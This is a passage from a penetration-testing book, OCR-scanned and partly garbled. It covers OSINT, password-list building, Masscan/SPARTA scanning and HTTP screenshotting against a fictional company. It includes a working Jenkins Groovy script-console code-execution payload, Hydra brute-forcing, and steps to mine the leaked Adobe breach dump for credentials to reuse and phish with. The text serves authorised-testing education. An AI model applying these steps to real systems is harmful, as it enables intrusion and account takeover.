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Recon-ng Reconnaissance Report 


wwwreccn notc«-n 




Recon-ng Report 


From the results above, we can see that we have been able to quickly identify a ton of different 
hostnames, IPs, locations, email addresses, and more. This is a great start for getting some 
reconnaissance on our victim. Let’s keep gathering data! 


Discover Scripts 

f https://github.com/leebaird/discover ) (Kali Linux) 


Discover scripts by Lee Baird is still one of my favorite passive discovery tools because of the ease 
of use and the amount of data gathered. Using a passive recon scan, Discover will use tools such as: 
dnsrecon, goofile, goog-mail, goohost, theharvester, metasploit, urlcrazy, whois, dnssy, ewhois, 
myipneighbors, and urlvoid. Discover is updated often and is a great tool for performing OSINT. 
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RECON 

1. Domain 

2. Person 

3. Parse salesforce 

SCANNING 

4. Generate target list 

5. CIDR 

6. List 

7. IP, Range or URL 
WEB 

8. Open multiple tabs in Iceweasel 

9. Nikto 

10. SSL 

MISC 

11. Crack WiFi 

12. Parse XML 

13. Start a Metasploit listener 

14. Update 

15. Exit 

Choice: 


Discover Script 


• cd /opt/discover 

• ./discover.sh 

o 1. Domain 
o 1. Passive 
o [Company Name] 
o [Domain Name] 

o fire fox /root/data/ [Domain]/index, him 


The results include information about email addresses, names of employees, and hosts. 




om/pages/passive-recon.htm 

/e Security ^Kali Linux "VKaliDocs OExploit-DB ^Aircrac 
Home Contacts DNS 

Reports: Passive Recon 


Summary 

Emails 

18 

Names 

87 

Hosts 

9 

Squatting 

48 

Subdomains 

32 

Text 

1 

Emails (18) 



@suck.testlab 
eli@suck.testlab 
feedback@suck.testlab 
jay@suck.testlab 
j gallegos(»suck.testlab 
j grosser@suck.testlab 
joe@suck.testlab 
justthetip@suck.testlab 
mark@suck.testlab 
mike@suck.testlab 
opensource@suck.testlab 
plathrop@suck.testlab 
ron@suck.testlab 
sammy@suck.testlab 
sbaker@suck.testlab 
sfrench@suck.testlab 
support@suck.testlab 
synack@suck.testlab 

Names (87) 


Ackerson, Matt 
Adelson, Jay 
Ahuja, Nancy 

s/passive-recon.htm 

Discover Report 


Some of the more interesting findings are those such as squatting and bitflipping. Discover shows us 
which squatting domains have been purchased and which are currently free. In an engagement, a 
doppelganger domain could prove extremely valuable for phishing, trust, or compromising victims. 
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Reports: Passive Recon 

Squatting (48) 


Character Omission sue.testlab 199.181.132.250 united States 

Character Repeat suckk.testlab 103.232.215.143 

Character Swap Suck.testlab 209.61.212.154 United States 

Double Character Replacement succk.testlab 72.52.4.119 United States 
Hissing Dot suckcom.com 96.44.141.211 united States 

Hissing Dot wwwsuck.testlab 54.72.9.51 United States 


Subdomains (32) 


about.suck.testlab 
about.suck.testlab 
about.suck.testlab 
apidoc.suck.testlab 
blog.suck.testlab 
til on. suck .testl ah 


50.18.104.27 

50.18.125.174 

50.18.188.137 

50.18.169.106 

66.6.42.22 

fifi.fi.43.2? 


Discover Domain Information 


Spiderfoot 

f http://www.spiderfoot.net/ ¥Kali Linux) 


One last tool I like to use for OSINT is SpiderFoot. SpiderFoot, written by Steve Micallef, is a quick 
little tool that performs a ton of different OSINT recon. Every tool queries the data slightly differently 
and presents it in different fashions. Thus, it helps to have multiple tools to gather OSINT data to 
compile a good view of the victim company. 


Running SpiderFoot: 

• cd /opt/spiderfoot/spiderfoot* 

• python ./sf.py 

• open up a browser and go to http://127.0.0.1:5001/ 









SpiderFoot v2.3 - Iceweasel 
0 SpiderFoot v2.3 * ^ 
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New Scan 

Scan Name 
SUCK 

Seed Target 

By Required Data By Module 


S£fc*Ct A! ■ All 


0 

Affiliate - IP Address 

0 

Affiliate ■ IP Address - Subnet 

0 

Affiliate - Internet Name 

0 

Affiliate - Web Content 

0 

BGP AS Membership 

0 

BGP AS Ownership 

0 

BGP AS Peer 

0 

Blacklisted Affiliate IP Address 

0 

Blacklisted IP Address 

0 

Blacklisted IP on Owned Netblock 

0 

Blacklisted IP on Same Subnet 

0 

Co-Hosted Site 

0 

Cookies 

0 

DNS TXT Record 

0 

Defaced 

0 

Defaced Affiliate 

0 

Defaced Affiliate IP Address 

0 

Defaced Co-Hosted Site 

171 

Defaced IP Address 

171 

Device Type 


SpiderFoot 


What type of information is collected? Everything from blacklists to IPv6 addresses to Co-Hosted 
Sites to E-mail addresses. As you know, every tool is maintained differently and there are many times 
where one tool will find different information compared to another tool. What is good about 
SpiderFoot is that it is quick, very easy, and comes back with a ton (I mean a ton) of great OSINT 
information. I ran a quick scan for a site and within seconds, I found loads of information on a domain 
or IP. 














SO Sptofool v£I * ♦ 

4* 9 127 . 0 . 0.1 ... r ' • . i- . • . .. 


-c 0- 

<X t) * ft 

|MmI ViM*d v S«<uiity \KAiU« 

in \Kdi DMt Qe >pux D6 




o 


Total 


206 

| Unique 

167 

| Status 

RUNNING 


Errors 



SpiderFoot Report 


With these three sources, we should have a good idea of our victim’s open source intelligence. This 
data will become very valuable later, so make sure you review all the data thoroughly. 


Creating Password Lists: 


From the OSINT searches, we have learned a great deal about SUCK and their organization. The next 
step is to find more targeted information about the company, the people, the location, and their 
customers by developing more customized password lists. We have all used large password lists in 
the past and specifically in THP1, but we are looking to crack that 70%+ rate. To achieve this, we 
need to create custom and smart word lists based on our victim companies and related industries. 


In the last book, we used the crackstation list, which we will definitely use again, but after having a 
great password base, you need to also build a list of custom passwords. 


Wordhound 

f https : //bitbucket.org/mattinfosec/wordhound. git l (Kali Linux) 


Wordhound is a tool that creates word lists and dictionaries based on Twitter searches, PDF 
documents, and even Reddit sub-reddits. So to target our victim company, we can grab all the results 
from their tweets and even words that might be associated with the company. {1} 


Wordhound didn’t run right off the bat in Kali Linux at the time of writing this book, so I had to do a 
few modifications: 

• git clone https://bitbucket.org/mattinfosec/wordhound. git /opt/wordhound/ 

• apt-get install python-setup tools 

• cd /opt/wordhound && python setup.py install && ./setup.sh 








I had some issues with tweepy, so i had to manually git clone it and re-download it: 

• manually install tweepy 

o pip install -U pip 

o git clone https://github.com/tweepy/tweepy.git /opt/tweepy/ 
o cd /opt/tweepy 
o python ./setup .py install 
o /usr/local/bin/pip install requests [security] 
o service ntp restart 

Once you get everything working, we need to edit the configuration file: 

• cd /opt/wordhound && gedit wordhound.conf.dist 

• Input the relevant information such as your twitter API key if you want to use twitter. 
If you don’t currently have a Twitter API key, you can get one from here: 
https://apps.twitter.com/app/new . Once you get your key, write down your: 

o Consumer Key (API Key) 
o Consumer Secret (API Secret) 
o Access Token 
o Access Token Secret 

• cp wordhound.conf.dist wordhound.conf 

After adding these to your wordhound.conf.dist file, save or move that copy to wordhound.conf. That 
is really the only initial configuration you will need to get this all working. For our first run, we are 
going to first generate a dictionary from a website. This will scrape the webpage and make a unique 
list of words to use for our password list. 


To start Wordhound: 

• cd /opt/wordhound 

• python Main.py 

• 1. Generate Dictionary 

• 3. Create new industry 

o Enter industry: SUCK 

• 1. Generate Dictionary 

• 1. SUCK 

• 1. Create new client 

o SUCK 

• 1. Generate Dictionary from website. 

o http://www.securepla.net 

• How many levels: 3 

• gedit "data/industries/Hacker Playbook/Hacker Playbook/WebsiteDictionary.txt" 






bypassuac 
pentestgeek 
hack er 

mimikatz_t runk 

smbexoc 

mimikatz 

cookie 

minikats 

t rustedsec 

mkdir 

- fpi m n n n n 

scans 

vulnerabilities I ;J . 1, S I |_ 1 

laterally 

pentesting 

playbook 

peepingtom 

brav 

lateral 

crackstatlon 

hackers 

titrtliwygi 

"data/indust ries/Hacker Playbook/Hacker PIaybook/WebsiteDxc tiona ry.txt" 


Wordhound - Web Results 


Now, with a good list from websites, we need other sources of data to append to that list. One great 
source of valuable data is Twitter. Twitter usually includes very relevant data based on specific 
searching. We can use Wordhound to go through Twitter on a specific word or words and grab all the 
unique words from it. Let’s run this by choosing: 


• 4. Generate Dictionary from twitter search term. 

o Search Term: hacking 

• gedit data/industries/Hacker\ Playbook/Hacker\ 

Playbook/TwitterSearchTermDictionary.txt 


root@kali: /opt/wordhound 

File Edit View Search Terminal Tabs Help 


root@kali: /opt/wordhound X root@kali: /opt/wordhound WebsiteOictionar 


== CLIENT OPTIONS == 

[+] Please choose an option: 

1. Generate Dictionary from website. 

2. Generate Dictionary from Text file. 

3. Generate Dictionary from pdf. 

4. Generate Dictionary from twitter search term. 

5. Generate Dictionary from Reddit 

6. Generate aggregate client dictionary. 

4 

[-] Please enter the search term: 
hacking 

How many tweets would you like to analyse?:(Default = 700) (Max = 700) 
700 

[+] Querying twitter for hacking 
(-) Authorizing twitter API 
(-] Twitter auth successful 
(-) Retrieving search data 
(-] Downloaded 100 tweets 
(-] Downloaded 200 tweets 
(-] Downloaded 300 tweets 


Wordhound - Twitter 
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root@kali: /opt/wordhound TwitterSearchTermDictionary.t 
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Wordhound - Twitter Results 


Another favorite source of data is from Reddit. This is where you get creative. You need to find the 
right sub-reddits that represent your company or industry. You can try a multitude of different sub- 
reddits to find out which best suit your engagement. 


Since our target in this case is a security company, we can parse one of my favorite sub-reddits: 
/r/netsec. Let’s see what types of unique words we can identify: 


• 5. Generate Dictionary from Reddit 
o netsec 









root@kali: /opt/wordhound 

RedditDictionary.txt 

peterp refer 


iinmemory 


annonymous 


mandem 


damn 


iwriteable 


jadddress 


opsec 


block cipher 


iblockcipher 


dont know 


dontknow 


memory dump 


memorydump 


inorth korea 


northkorea 



Wordhound - Reddit 


We can see from /r/netsec, that we have a lot of new words to add to our potential password list that 
we might not have caught with the other lists. Target industries from different subreddits-maybe the 
city they belong to, the company, the industry, etc. 


Brutescrape 

( https://github.com/cheetz/brutescrapc i (Kali Linux) 


I had problems getting Wordhound to parse webpages properly, so until it is fixed, I created a quick 
python script to scrape pages and provide unique results. BruteScrape is a tool that reads the source 
of any webpage, parses out all the HTML tags, cleans up the results, and uniques them. This is a great 
quick tool to build password lists from a bulk import of websites. 


• cd /opt/brutescrape/ 

• gedit sites.scrape and put in the websites you want to scrape 

• results are stored to passwordList.txt 







Brute Scrape 


The customized passwords gained from BruteScrape and Wordhound, combined with the large 
common password lists, give us a great start to crack and brute-force accounts. 


Using Compromised Lists To Find Email Addresses And 
Credentials 


The great thing about being a penetration tester is that you have to get creative and use all sorts of 
resources, just as if someone was malicious. One tactic that I have found to be very fruitful in the past 
is using known credential dumps for password reuse. Let me explain a little more in detail. 


There was a large breach of Adobe's systems. The compromised information consisted of email 
addresses, encrypted passwords, and their password hints. {2} The large dump, which was almost 10 
Gigabytes, was released privately in small circles and is now publicly available (try searching for 
Adobe and users.tar.gz). From an attacker's perspective this is a gold mine of information. What I 
generally do is parse through this file and identify the domains against which I am doing a test. 


Of course, it is important to see if this type of testing is in the scope of your engagement and that you 
aren't breaking any laws by obtaining a copy of any password/compromised lists. If it is a full black 
box test, this should definitely be a part of your attacking approach. 


For example, in the image below, I will search (using the Linux grep command: grep "@yahoo.com" 
cred > hashlist.txt) through the Adobe password list for a sample domain of yahoo.com and write that 





to a file named hashlist.txt (remember you should search for the domain for which you are testing). 
We can see that there are many users (which I redacted) with an email address containing yahoo that 
have an encrypted password and password hint. 
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List of Accounts/Passwords from Adobe Breach 2013 


Based on the hints, you could do some research and find out who a specific user's boyfriend is or the 
name of their cat, but I usually go for the quick and dirty attempt. I was able to find two groups of 
researchers who, based on patterns and hints, were able to reverse some of the encrypted passwords. 
Remember that from the Adobe list, since the passwords aren't hashes but encrypted passwords, 
trying to reverse the passwords is much more difficult without the key. The two reversed lists I was 
able to identify are: 

• http: //stricture- group .com/files/adobe-top 100 .txt 

• http://web.mit.edu/zyan/Public/adobe_sanitized_passwords_with_bad_hints.txt (no 
longer available) 


I combined both these lists, cleaned them, and hosted them on my Github: 

• https: //github .com/ cheetz/ adobe_password_checker/blob/master/foundp w. cs v 









Taking this list, I put together a short python script that parses through a list of email/encrypted 
passwords and compares that against the foundpw.csv file. Let’s pull this code onto your Kali Linux 
host: 

• git clone https://github.com/cheetz/adobe_password_checker 

/ opt/ adobe_password_checker 

• cd /opt/adobe_password_checker/ 

The password_check.py python script will find any password matches between the hashlist.txt file 
you created and the foundpw.csv file, which contains known passwords. When a match is found, the 
script will return a list of email addresses and the reversed passwords. Of course, the two research 
groups do not have a large number of the passwords reversed, but it should contain the low-hanging 
fruit. Let's see this in action: 

• Make sure to copy your hashlist.txt file to /opt/adobe_password_checker/ 

• python password_check.py 


rooted i : /opt/iicJobE_pdbbwcii d cbpCkci # p/thflfi p*SfiwOi*d_Ch6Ck.py 
Matches!*]: t@ydhoo,com 3 @oZhMbSAC6cdBSCql/U(]~ J if your a hacker my password is january^ 
Hatches[+j: Qyahoo.cwn : QoZhW:lb£AC6cd0SCql/UD== J if your a hacker my password is January^ 
Hatches[+]: plgyahoo.com : 0oZhiarzlb5.AC6c<fBSCql/LlQ== P if your a hacker rcy password is januarj 
Hatche$[+j: {Syahoo.com ; 0oZh^felb$AC$cdBSCqUUfl»= H if your a hacker my password is January^ 
Hatches[+]: wis48{yflhoo.com ; 0oZh'lizlbSAC6cdB^Cql/IJQ==,if your a hacker my password is jane 
Matches!*]: Sgyah 00 .com : SaZhW^lbSdSSCql/uQ=-,if your a hacker my password is january^ 
Matches!*]: IBSgyahoo.coffl : 0oZhMbSftC5cdBSCqI/U{)" F if your a hacker my password is januai 
Matches!*]: dhoc.eom : SSfeSLHkoolk^.cDmioi password Is the key its right in front of_ 


Custom Python Script to Look for Email/Passwords 


I will usually take the results from this output and try the usernames/passwords against the company's 
Outlook Web Access (OWA) logins or against VPN logins. You may need to play around with some 
of the variables on the passwords (i.e. if they have 2012, you might want to try 2015) and also make 
sure you don't lock out accounts. 


I then take the email addresses gathered from these findings and use them in spear phishing 
campaigns. Remember, if they are on the Adobe list, there is a good chance that these users are in the 
IT group. Owning one of these accounts could be extremely beneficial. 


This is why penetration testing is so much fun. You really can't just run tools-you have to use your 
own creativity to give your customer the best and most real-world types of attacks they might receive. 
Don’t forget to keep checking Pastebin type sites, password dump sites, and Bittorrent files for 
password leaks. 


Gitrob - Github Analysis 

flittps:// gjthub.com/micheririksen/gi trob l (Kali Linux) 


In today’s world, the “information gathering game” is changing ever so rapidly. If your client is a 
large client, chances are many of the developers are also on Github. This is where Gitrob comes into 
play. Michael Henriksen developed a tool to search through Github for a customer and any potentially 
sensitive files. These files can include secret HTTP endpoints, session IDs, user information, 
passwords and API keys. 

In terms of OSINT, these sources are great for gathering emails, learning about what the potential 
company might be developing, default passwords, possible API keys, and more. 

Configuring Gitrob: 

• cd /opt/gitrob/bin 

• ./gitrob —configure 

• user: gitrob 

• password: from what you configured during the installation 

• To access Github via this API, we need to first get an Access Token: 

o Create/Login to Github Account 
o Go to Settings -> Applications 
o Generate Token 

• Enter the Token into Gitrob 
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Gitrob search 


To start a Gitrob search: 

• gitrob -o <orgname> 


In our example below, we will test this against the org name of reddit. 






:/opt/gitrob/bin# git rob -o reddit 


j By (jlmichenriksen 

[*] Starting Gitrob version 0.0.3 at 2015-01-15 04:09 EST 

[*] Loading configuration.. . done 

[*] Preparing SQL database... done 

[*] Loading file patterns... done 

[*] Collecting organization repositories... done 

[*] Collecting organization members... done 

[*] Collecting member repositories... 

[>] Collected 6 repositories from atiaxi 

[>] Collected 14 repositories from ajacksified 

[>] Collected 5 repositories from alienth 

[>] Collected 3 repositories from bsimpson63 

[>] Collected 16 repositories from btholt 

[>] Collected 5 repositories from Deimos 

[>] Collected 9 repositories from JordanMilne 

[>] Collected 7 repositories from mtitolo 

[>] Collected 1 repository from rrain 

[>] Collected 15 repositories from spladug 

[>] Collected 6 repositories from umbrae 

[>] Collected 27 repositories from xiongchiamiov 

[>] Collected 6 repositories from zeantsoi 

[*] Processing repositories... 

[>] Processed 75 files from reddit/reddit-il8n with no findings 
[>] Processed 128 files from reddit/iReddit with no findings 
[>] Processed 28 files from reddit/snudown with no findings 
[>] Processed 19 files from reddit/monitors with no findings 
[>] Processed 20 files from reddit/error-pages with no findings 
[>] Processed 20 files from reddit/push with no findings 


Gitrob - Running 


Once the scan is complete, open a browser and go to http://127.0.0.1:9393/. You will see three tabs. 
The first tab is the findings. These might contain information such as references to secret HTTP 
endpoints, session IDs, user information, passwords and API keys. 



Gitrob - Findings 


The second tab shows all the users it was able to grab, along with associated repositories. 














Organizations ) reddit 



OSINT Data Collection 


Collecting and studying a company passively is one of the most important factors in a successful 
penetration test. This allows us to gain a wealth of data without ever triggering a single IDS alert. 


We should now have enough information about the company, the industry, and possible user 
passwords. The best part is that we found all this data passively. Let’s move on to scanning and 
active discovery. 


External/Internal Active Discovery 


Active discovery is the process of trying to identify systems, services, and potential vulnerabilities. 
We are going to target the network ranges specified in scope and scan them Whether you are scanning 
from the internal or the external segments of the network, it is important to have the right tools to 
perform active discovery. 


I want to emphasize that this book is not going to discuss in detail how to run a scanner, as you should 
already be familiar with that. If you aren’t, then I recommend that you download the community 
edition of Nexpose or get a trial version of Nessus. Try running them in a home network or even in a 
lab network to get an idea of the types of findings, how to use authenticated scans, and the type of 
traffic generated on a network. These scanners will trigger IDS/IPS alerts on a network very 
frequently as they are extremely loud. Now that we are ready, let’s get into some of the finer details 
here. 


In this section, I describe the process that I like to use when scanning a network. I will use multiple 
tools, processes, and techniques to try and provide efficient and effective scanning. My scanning 
processes will look something like this: 


• Scanning with Masscan 




• Scanning with Sparta 

• Scanning with HTTP Screenshot 

• Scanning with Eyewitness/WMAP 

• Scanning using Nexpose/Nessus/OpenVAS 

• Scanning with Burp Proxy Pro 

• Scanning with ZAP Proxy 

• Parsing Output 

Masscan 

t https://github.com/robertdavidgraham/masscan ) (Kali Linux) 


Once you start active scanning, there are many tools to use. Historically, we have all used nmap to 
map out IPs/Ports, but the game has been changing. Large ranges are a pain to scan, but this is where 
Masscan comes into play. Similar to nmap (it even has similar flags), Masscan uses its own custom 
TCP/IP stack for speed and efficiency. Let’s see how we would kick off a Masscan scan. 

Running Masscan: 

• cd /opt/masscan/bin/ 

• ./masscan -p80,8000-8100 10.0.0.0/8 

• ./masscan-p0-65535 —rate 150000 -oLoutput.txt 

o -p defines the ports to be scanned 
o —rate defines packets-per-second 

■ Be careful with this setting. Make sure your VPS the 
servers or that the system/network from which you run 
Masscan can support the amount of traffic 
o -oL defines the list output to write to 


Lor example, I ran some test scans from a VPS server: 

hp2:/opt/masscan/bin$ ./masscan -p0-65535 23.239.151.0/24 —rate 150000 -oL 
output.txt 

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-02-02 05:46:10 GMT 

— forced options: -sS -Pn-n —randomize-hosts -v —send-eth 

Initiating SYN Stealth Scan 

Scanning 256 hosts [65536 ports/host] 

hp2:/opt/masscan/bin$ date 

MonLeb 2 05:48:23 UTC 2015 

Prom the test scan above, we are looking at taking about two minutes for the configuration and system 
on which we are testing. Luckily my VPS has very large networks and can support a high rate of 
packets per second. 

Running nmap with similar settings: 

hp2:/opt/masscan/bin$ nmap -v -PN -n -sT -T5 23.239.151.0/24 -p0-65535 -oN 




output_nrnap.txt 

StartingNmap 6.47SVN ( http://nmap.org) at 2015-02-02 05:53 UTC 
Initiating Connect Scan at 05:53 
Scanning 64 hosts [65536 ports/host] 

Discovered open port 80/tcp on 23.239.151.23 

Stats: 0:00:22 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan 
Connect Scan Timing: About 1.18% done; ETC: 06:26 (0:32:11 remaining) 


From the in progress results above, we can see the scan will take well over 30 minutes (as it is 
scanning 64 hosts at a time). 


Masscan improves scanning significantly and allows a tester to scan and have results in minimal time. 
One feature that really helps you configure your Masscan scans is the use of the --echo switch. The 
example below writes a sample scan to a file. Reading that file configures all the different settings 
that the scan will use. Once all the settings are correct, a scan can be kicked off with a “-c” flag. 

• hp2:/opt/masscan/bin# ./masscan -p0-65535 23.239.151.0/24 —rate 150000 -oL 
output.txt —echo > scan.conf 

• hp2:/opt/masscan/bin# cat scan.conf 
rate = 150000.00 

randomize-hosts = true 

seed=14393045175689752532 

shard =1/1 

# ADAPTER SETTINGS 
adapter-ip = 0.0.0.0 

# OUTPUT/REPORTING SETTINGS 
output-format = list 

show = open,, 
output-filename = output.txt 
rotate = 0 

# TARGET SELECTION (IP, PORTS, EXCLUDES) 
ports = 0-65535 


range = 23.239.151.0/24 

• hp2:/opt/masscan/bin#./masscan -c scan.conf 

We can save this template and use it for all future scans or have a list of templates for specific types 
of scans. 


Sparta 

f http://sparta.secforce.coni/ lf Kali Linux) 



Throughout this book, I really try to push the ideas of efficiency and effectiveness. Scanning really 
large networks works great with Masscan, but for smaller or internal networks, we can use a tool like 
SPARTA. 


“SPARTA is a python GUI application which simplifies network infrastructure penetration testing by 
aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by 
having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If 
little time is spent setting up commands and tools, more time can be spent focusing on analysing 
results.” {3} 


The reason I have found SPARTA to be valuable as part of my toolkit is that it runs NMAP in a 
staged process. SPARTA will start an initial scan of limited ports, start Nikto for any web ports, and 
performs screen capture. After the stage 1 scan finishes, it will start a much deeper stage 2 and stage 
3 scanofNmap. 

Once services are identified, you can easily manually check Nikto, MySQL default credentials, and 
plug directly into the Hydra password brute-force tool all via the GUI interface. 


To start up SPARTA: 

• cd /opt/sparta/ 

• ./sparta.py 

SPARTA is really simple and straightforward to use. Once you load up the GUI console, click to add 
hosts and start scanning. SPARTA takes advantage of the nmap detection to start using its auxiliary 
modules. 



Click to view your appointments and ta: 
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SPARTA - Nikto Scan 


In the Nikto tab, we can see the results from the Nikto scan. 

















Scripts 

Information 

Notes 

' nikto (80/tcp) E 

screenshot (80/tcp) GD 


- Nikto v2.1.6 


♦ Target IP: 10.239.151.23 

+ Target Hostname: 10.239.151.23 
+ Target Port: 80 

+ Start Time: 2015-02-16 15:49:07 (GMT-5) 


+ Server: Apache/2.4.7 (Ubuntu) 

♦ Cookie PHPSESSIO created without the httponly flag 
+ Retrieved x-powered-by header: PHP/5.5.9-lubuntu4.5 
+ The anti-clickjacking X-Frame-Options header is not present. 

+ Root page / redirects to: dashboard/ 

+ No CGI Directories found (use *-C all* to force check all possible dirs) 

SPARTA - Nikto Results 


SPARTA will also use cutycapt to take screenshots of the web pages. 
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SPARTA - Screenshot 


What makes SPARTA so quick is that you can right-click on any host and send it to Hydra. In this 
case, we identify a host with SSH running on HTTPS (443). We can right-click on that host and “Send 
to Brute”. 
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SPARTA - Brute-force 


Clicking on the Brute tab, you can supply either a single username/password combo or form 
password lists. 
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SPARTA - Brute 


It also has additional functionality for MySQL to check default credentials. 
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SPARTA - MySQL Check 


While you might use Masscan on large external ranges to do initial discovery, SPARTA is a valuable 
tool to increase your scans. 


Http Screenshot 

( https://github ■com/breenmachine/httpscreenshot frKali Linux) 


One of the most efficient and effective starting points on a penetration test is understanding what 
systems and services are available. Although there are plenty of network/service level exploits, I 
have found most initial entry points into an organization, especially from the outside, to be via web 
























applications, because systems have default passwords, simple misconfigurations, or many known 
web application flaws. 


After the reconnaissance phase, you have identified that the Secure Universal Cyber Kittens company 
has a CIDR /20 range on their externally-facing environment. That comes out to 65536 different IPs 
that we need to scan and start analyzing. Sure, we kick off our vulnerability scanner in the 
background, but we need to start attacking, as time is limited. Since there is no way we could visit 
each and every one of those web pages, we need to automate this process and be able to utilize the 
resulting data in an efficient manner. 


This is where we combine both Masscan and HTTP Screenshot to scan the network and take 

screenshots of the webpages. This way, we can visually look at web pages instead of visiting them 

one by one. Before starting the scan, we need to configure a few settings: 

• cd /opt/httpscreenshot 

• edit masshttp.sh to make sure it points to the right masscan executable and make sure 
that httpscreenshot.py points to the correct location. 

o instead of /root/masscan/bin/masscan, it should be 

/opt/masscan/bin/masscan 

o instead of ~/tools/httpscreenshot.py, it should be 

/opt/httpscreenshot/httpscreenshot.py 

• change the port to be scanned from 80,443 to 
80,443,8000,8001,8080,8443,8008,9200,50070 [add your favorite web ports here] 

• create a file called networks.txt to put in the network cidr range you want to scan 

o gedit networks.txt 


Let’s kick off a scan: 

• ./masshttp.sh 

• firefox ./clusters.html 


With the speed of Masscan and the power of HTTP Screenshot, we have a list of websites with the 
host images. There are a lot of benefits of HTTP Screenshot such as resolving certificate hostnames 
for virtual/shared hosting and threading, but the biggest benefit is how it correlates similar web pages 
together. You might have a ton of http basic auth pages or printers and HTTP Screenshot will 
correlate them together. It makes it much easier for attacking and reporting. I will say that the output 
isn’t the prettiest, but the functionality is what works. 


So what are we looking for in web application screenshots? The things that should pop out are: 



JBoss 

Coldfusion 

Jenkins 

Authentication Pages 

Content Management 
Pages (WordPress, 
Joomla) 

VoIP Pages 

Networking 

Devices 

Printers 

Tomcat 

Beta/Dev 

Sites 

Indexed Pages 

Test sites 

Zencart 

IP-Cameras 

SCADA 

Outdated Copyright 


Why? Because we want shells! A great place to walk through to get a better understanding of 
vulnerable web applications is to review the exploits themselves. Let’s stop and take a quick look at: 

http://www.exploit-db.com/webapps/ . 


From our scan of SUCK, we see normal services like printers (which we will get into a little later), 
but one thing I now often see on pentests is a couple of Jenkins hosts. This quickly stands out to me 
and, as stated before, one of the benefits of HTTP Screenshot is that it puts all the Jenkins ’ servers 
together. Jenkins is a web application that provides continuous integration services for software 
development. Regardless of what it really does, it has some features that can give us our first point 
into our network. 


<t o * * i 



HTTP Screenshot 


Unauthenticated Jenkins servers are known to have a flaw that allows remote code execution using 
Groovy Script. Pentestgeek.com did a great article on how to take advantage of this vulnerability, by 
visiting the Jenkins ’ box over port 8080 and traversing to /script/script: 

• http://[IP]: 8080/script/script 


Here, we are presented with a script console, where we can execute arbitrary Groovy Script 
code{4}: 

• def sout = new StringBuffer(), serr = new StringBuffer() 

• defproc = '[Code to Execute Here]'.execute() 

• proc.consumeProcessOutput(sout, serr) 






























• proc.waitForOrKill(lOOO) 

• println "out> $sout err> $serr" 

This works on both Windows and *nix systems, so just make sure you first find out what system you 
are attacking. In the example below, we will run a quick “cat /etc/passwd” to make sure that we have 
code execution. 



Jenkins 


New Item 
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^ Build Htstory 


Script Console 

Type hi an aftxtrafy Groovy send and execute it on the server Useful for trouble-sh 
you use Systeei.out. * wet 90 to the server's stdout. which is harder to see.) Ex* 
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Build Queue 
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2 Mie 


println(Jenkins.instanoe.pluginHar\ager .plugins) 

All the classes Irom afl the pkjgms are visrbie ) enk ins.* j enk 1 ns. model. * t 


de< sout ■ new StnngBuf far () # serr ■ new St ring 0uf f er () 

def proc = cat /etc/passwd .execute () 

proc.consumeProcessOutput ( sout, serr) 

proc .waitForOrKilU 1000) 

println *out> $sout err> fserr* 


Result 

out> root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bm:/bin/sh 
■ ■ - Uw:;biny&h 

Jen kin s Vulnerable Server 


As you can see in the results, we were able to execute and read our payloads. We won’t dive much 
more in this section, but this provides a good example of how HTTP Screenshots can be beneficial. 


One additional thing I want to point out when doing web screenshots is that you will sometimes run 
into issues where one of the tools does not work or run into certain scenarios where you need more 
information. I always tell my readers to never focus on one tool, and in this case there are two other 
tools to look at: 


Eyewitness - https://www.christophertmncer.com/eyewitness-triage-tool/ ended up really replacing 
Peepingtom, which was talked about in the first book. Eyewitness works great, but I have had 
problems on large scans. These might be fixed by now, but this was just one of the many issues I kept 
running into. 


One other tool that I would look into is an interesting project called WMAP Network Scanning. The 
gap they are trying to solve is that these web scrapers don’t generally handle or render Flash or Java. 
On those special pentests where you have a ton of these types of sites, you could look into this 








Chrome Extension: 

• http://thehackerblog.com/wmap-a-chrome-extension-for-taking-screenshots-of-web- 

services/ 

• https://chrome. google.com/webstore/detail/wmap/pflahkdj lekaeehbenhpkpipgkbbdbl 

How WMAP works is that it uses Chrome to open a new tab with the IP and takes a picture of the 
page. It takes advantage of the fact that the browser will do all the rendering. 


Configuring WMAP is extremely simple after the installation of the Chrome plugin. 


chrome-extension //pflahkdjlekaeehbenhpkpipqkbbdbbo/src/index.htmld 
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WAMP Results 


I do have some problems with this tool, mainly with speed and how it opens a tab for each site, but it 














does render things that Peepingtom and Eyewitness cannot since it uses the browser. 


Vulnerability Scanning: 


After performing initial scans and mapping out the network, I usually like to kick off a couple of 
vulnerability scans in the background. I will go over a few tools to help you with vulnerability 
scanning. 


Rapid7 Nexpose/Tenable Nessus 

(Kali/Windows/OS X): 


Two of the most common vulnerability-scanning tools I see are Rapid7 Nexpose and Tenable Nessus. 
Like I said in the last book, there is always a huge war about which one of the scanners is better, and 
again I offer this caveat: I have used most of the commercial scanners and have never found one to be 
perfect or the right solution. When comparing these tools, I have seen that there are always some 
findings that are discovered and missed by certain tools. The best idea would be to run multiple tools, 
but this isn't always the most financially acceptable solution. My quick two cents is that if you are 
going to purchase a single license, I would recommend getting Tenable's Nessus Vulnerability 
Scanner. For the number of IPs you can scan and the cost ($1,500), it is the most reasonable. I have 
found that a single consultant license of NeXpose is double the price and limited on the number of IPs 
you can scan, but I ask that you verify, as you never know when prices might change. In terms of 
performance and ease of use, for large complex networks, I prefer the management interface on 
NeXpose. In terms of finding odd vulnerabilities, Nessus takes the cake on this one. They definitely 
do a lot of research on embedded devices and SCADA (and the like), where I don’t see those types of 
findings onmyRapid7 reports. 


The best option here is to give both of them a trial: 

• Rapid7 NeXpose: 

http: / / www ,rapid7 .com/ products/nexpose/compare-do wnloads ,j sp 

• Tenable Nessus: 

www.tenable.com/products/nessus/evaluate 


Openvas 

f http://www.openvas.org/VKalP) 

Since I do discuss a lot about commercial tools, as I mentioned in previous chapters, I want to be 
able to complement them with Open Source tools. There is a decent open source vulnerability tool 
that you can also use in your arsenal. Open Vulnerability Assessment System (Open\AS) is a great 
tool for learning and testing vulnerabilities. Compared to the commercial tools, from my experience, 
OpenVas does pick up a lot of the similar findings, but I have noticed on engagements that it misses 
potentially high findings. I have also noticed that with OpenVAS, I had a lot of trouble when things 





break. When it breaks, it breaks hard and a lot of manual work is needed to get it back up and running. 


The positive side of OpenVAS is that it does do all the things required by a scanner. It can run 
